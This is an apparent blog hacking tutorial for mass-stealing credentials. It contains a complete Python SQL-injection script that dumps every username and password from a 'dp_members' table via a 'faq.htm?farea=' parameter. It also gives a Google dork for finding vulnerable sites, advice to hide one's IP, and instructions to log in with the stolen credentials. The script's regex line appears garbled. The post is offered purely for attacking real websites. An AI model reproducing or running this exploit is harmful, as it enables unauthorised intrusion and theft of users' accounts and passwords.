8:22 PM
Blackmygo
This is a tutorial about how to use an exploit from inj3ct0r.com to compromise every username & password on the website.
Ok Let Do it.
As an example, we'll use this one:
http://inj3ct0r.com/exploits/13546
As you can see this is an SQL injection exploit, so you'll have to have a basic understanding of SQL injection (if you don't there are some great guides on this forum, just search).
Now this exploit doesn't give any information about what it does, so we'll have to figure it out. All gives us is a python script.
By taking a look at the script we can see that it takes the target URL as an argument. Then it appends "faq.htm?farea=" + SQL injection
The Injection code prints a username + password from a databse called "dp_members" it surrounds it with triple colons (0x3a3a3a) like:
:::username:::password:::
That's greatl, but how do we find vulnerable targets? Well, by looking at the script we can deduce that this google dork will find some targets for us.
inurl:"faq.htm?farea="
Awesome, so now we have got our targets. All that's missing is to improve the script so that instead of getting one username, it get's all of them. This script is written entirely by me, but based on the original exploit script.
Save this code as exploit.py.
import sys, os, urllib2, re
os.system('cls')
os.system('clear')
print "_______________________________________________________________"
print ""
print " by Blackmygo [Black-mygo.blogspot.com] "
print " Based on http://inj3ct0r.com/exploits/13546 "
print ""
print "_______________________________________________________________"
if len(sys.argv) < 2:
print "\nWhat website should we exploit? eg: http://target.com/"
site = raw_input("Address: ")
else:
site = sys.argv[1]
if site[-1:] != "/":
site += "/"
#::: configuration
vfile = "faq.htm"
query = "?farea=-5+union+select+1,concat(0x3a3a3a,username,0x3a,password,0x3a3a3a),3+from+dp_members+limit+"
login = "members/login.htm"
#::: configuration
url_attack = site + vfile + query
url_login = site + login
counter = 0
success = True
print "\n" + site
print "Exploiting now..."
print "_______________________________________________________________\n"
while success == True:
limit = str(counter) + ',' + str(counter+1)+'+--'
try:
doc = urllib2.urlopen( url_attack + limit ).read()
except urllib2.HTTPError:
print "HTTP Error 403: Forbidden"
sys.exit(1);
booty = re.findall(r':::blink:.*):::' , doc )
if len( booty ) > 0:
print booty[0]
counter += 1
else:
success = False
print "_______________________________________________________________"
if counter == 0:
print "expliot failed. Try manual injection.\n\n"
else :
print "Retrieved " + str(counter) + " logins. Use them at: " + site + login
Before we do this make sure you turn on your proxy/VPN or whatever you are using to hide your IP.
Now., if you are on Linux / Mac OS X:
chmod +x exploit.py python exploit.py
Windows:
python exploit.py
it will ask you for your target, use one you found by using your Google dork. Be aware that not all websites listed will be vulnerable, so try a few.
Next, just sit back and watch the magic happen. The plaintext usernames & passwords will go appearing in your terminal. Once the script has dumped the entire members database, it will give you the login URL so you can try them.
0 comments:
Post a Comment